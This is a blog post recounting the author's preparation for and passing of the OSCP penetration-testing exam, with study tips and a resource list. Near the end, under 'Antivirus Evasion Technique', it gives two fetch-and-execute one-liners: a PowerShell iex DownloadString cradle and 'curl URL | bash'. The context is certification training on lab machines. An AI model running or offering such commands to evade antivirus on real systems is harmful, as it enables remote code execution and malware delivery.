OSCP Experience — How I Earned 100 Points in 10 Hours

Hi everyone, today I’m going to tell you my story on how I was able to root all 5 machines in my OSCP Exam and earned 100 points in just 10 hours! Hope you can get something from here that might be useful for you in your journey!

It wasn't easy but not hard at all, the only right way to describe the journey is the word “Exciting”. To give a better understanding, I am a Computer Science graduate with a Cyber Security Major. I have been involved in cyber defense technology research for the past 2 years.

I have a very good understanding of python, c, and bash. These three things played a major success in my blue-team-related thesis about using machine learning to create a fully autonomous web application firewall. If you’re interested in one of our research about remote code execution, you can read it here

The Background

The first 10 days, while waiting for the PWK Labs, I decided to practice in Hackthebox Lab. I followed Tjnull’s OSCP like box and only did the Linux boxes. I plan to make myself familiar with Linux exploitation before the PWK Lab start, then I can focus on Windows Exploitation and Buffer Overflow later on.

The Methodology

  1. You keep trying the same exploit over and over again with an angry face and revert the machine over and over again. Smashing your keyboard in the process :)
  2. You reach out to the community/forum/ippsec video or official writeup to understand how the exploit work, why the service is exploitable, how doest the exploit takes place and you understand the flow.

I solved all of PWK labs and Tjnull’s list boxes and I do realize that sometimes we need to use a specific exploit with a very limited resource even in google. You need help, at least a sanity check, or a good keyword to keep you on the right track.

My methodology is simple, when I encounter a new service that I’m not familiar with and already spent too much time trying to get the exploit to work without any success, I will simply visit the forum without any hesitation. Then I make sure that I take good notes so that if I encounter the same service in the future, I can easily apply what I just learn. Pivoting and tunneling can be tricky too! Remember that “You learn something new every day.”

The PWK Lab

The Start

In my first week, I was able to root a total of 29 boxes🔥🔥. And the second week I was able to add another 23 to a total of 52 boxes in 2 weeks🔥🔥. My priority is to attack the active directory and dependent machines and skip the hard machines. Slowly but surely I can feel the fire inside me will light out soon.

The Burnout

To deal with this, I decide to take a week-long vacation. I went out with my family, play dota with my friend, stay up all night playing cyberpunk (with netrunner / hacker build for sure!) for the whole week. Whenever I felt guilty for myself, I would watch ippsec videos and keep on my notes going.

If you are in this period, to move forward you just need to constantly ask yourself

How bad you want it?

The burnout period

The Comeback

The Buffer overflow was a bit hard for me, luckily the offsec gave a very clear video explaining step by step how the exploit occurs, so I understand the whole flow of the exploit. After reproducing the win 32 BOF exercises, the BOF machine in the lab was too easy.

In the first month of my lab time, I was able to completely pwned all the boxes in the PWK lab! I felt very happy but also worried about Windows Privilege Escalation as I am not too familiar with windows env (I am a mac user).

The Waiting

In this period, I found https://ippsec.rocks/ and it is very useful in my exam. I booked for the 6th of September and later rescheduled it to the 3rd of September.

The Important Points in PWK Lab

  1. Make sure you solve the big 4 boxes in the lab without any help. No need to rush, just do these boxes whenever you feel ready. These boxes will give you lots of new knowledge.
  2. Make sure you rooted every retired exam boxes. You will know when you see one. These boxes are very different from the lab boxes. You will know why and it will make you know what to expect in the real exam.
  3. Make sure you master your tools. What did you choose? NmapAutomator? AutoRecon? Manual Nmap? Make sure to have familiarity with the result. Try your tools to the retired exam boxes.
  4. Make sure to master your reverse shell and understand how to choose the right port. Exam machine is very tricky and sensitive to port incoming-outgoing rules. Try to test your methodology in the retired exam boxes.
  5. For what is worth, don’t focus on your public dept as it will only provide you with the basic skills you need. Break into another department, learn how to pivot, and have fun with the real boxes!

The OSCP Exam

This was the first time that someone took the OSCP exam in my class and everyone was very excited even though they are not into offensive security at all 🙃🙃

15 minutes before the exam started, I left the discord channels and proceed to the verification process. Everything went well and I got my VPN access exactly at 10.00 AM

The Strategy

  1. Win32 Buffer Overflow (25 Points)
  2. Easy Box (10 Points)
  3. Medium Box (20 Points)
  4. Medium Box (20 Points) — Safe Point
  5. Hard box ( 25 Points)

I use NmapAutomator for the 25 points box to save time. Then I start with my plan.

The Unexpected

I took a break for 30 minutes after being done with Buffer Overflow while waiting for the Nmap to run. Ordered Gojek to deliver me some coffee, shihlin, candy, and lunch. I was very excited!!

The next is the 10 points and 20 point box. These two boxes teach me about “Expect the Unexpected” and “Try Harder” methodology 🙃🙃 I keep on making small mistakes by underestimating an exploit and choosing random port without any reason. After I applied things that I learned from the retired exam boxes in the lab, I was able to complete these boxes in just two hours.

The boxes are relatively easy but need lots of effort. Debugging, fixing, and downloading new services that I’m not very familiar with to get a better understanding is the way to understand the flow and flaw.

I took a one-hour break to go out with my little sister and pick up some ice cream at McD. Don't forget to relax, you’re free to take as many breaks as you want as long as you ask the proctor politely. Then I started my next box.

I have two mottos to keep me in line with the exploit and sanity check the progress. If it’s too hard I would ask my self “OSCP is a Foundation course, would it be this far?” and if it looks too easy and straightforward and the exploit didn't work, I would ask my self “If it is this easy, why the OSCP pass rate is really low? There must be another way”.

The next two boxes are relatively exciting. As far as I remember, I didn’t use any public exploit to gain shell at all! Purely chaining misconfiguration and taking advantage of open services! This box is very fun and represents a real-life scenario. In around two and a half hours I’ve managed to get root on the 20 points box and low-level shell in the 25 point box. I already got 87.5 Points in my pocket and feel safe.

I decide to take another one-hour break, I contacted my colleagues to inform them that I’ve got 4 roots and 1 low-level shell. They were very excited and congratulate me. My friends in discord were very happy and they sent me some food. I use this time to take a bath and relax.

The last privilege escalate took me 2 hours in total. It was very exciting to finally able to use my Web Exploit skill in this advanced CTF-like case. Chaining some vulnerabilities and services, I’ve managed to get a windows admin account as a web shell. I jumped out of my brand-new secret lab chair. My dad is next to me and hugged me when I said “I got 100 points”. I then chat the proctored to say “Heyy, just want to let you know I got 100 points :) I am very happy”. As expected he doesn't care and reply “Keep up the good work” 🙃🙃.

Even though it was a web shell, I master nishang as my secret weapon and know how to upgrade this shell to a fully interactive one. So I decided to take another 15 minutes short break to let my friends and colleagues know that I got 100 points! I WAS VERY HAPPY!

After the break, I upgraded the web shell to a qualified reverse shell, It was very easy when I already use nishang in all my windows boxes. In exactly 10 hours. I rooted 5 machines and got 100points! It took me another one hour to reproduce all the exploits and took screenshots for reporting. I stop my exam afterward.

I played Dota all night and start reporting the next day. Around 7 hours after my submission, I got an email from the offensive security team that I passed my OSCP Exam!

My Gift

Resources:

  1. Already got low-level shell? Linpeas/Winpeas to enumerate and pspy to guess the cronjob.
  2. Don’t know how to exploit specific services? Ippsec.rock
  3. Don’t know about common website and service exploit? hacktrics
  4. No service is exploitable? Try kernel exploit Linux Exploit Suggester 2 and Metasploit’s Local Exploit Suggester for Windows.

Antivirus Evasion Technique

For Windows, you can use :

powershell iex (New-Object Net.WebClient).DownloadString(‘url’)

And for Linux, you can take advantage of the command chaining operation, in this case, pipe to directly point the raw files to bash

curl URL | bash

Port Choosing Technique

I will update this section when I remember another resource I used.

Special Thanks

Thanks to my friends for the constant support and time invested in me: Christoval Leaved, Yerriell K Hidayat, Verdi Vajira, and Pulkit Talwar.

I like an idea of breaking into something.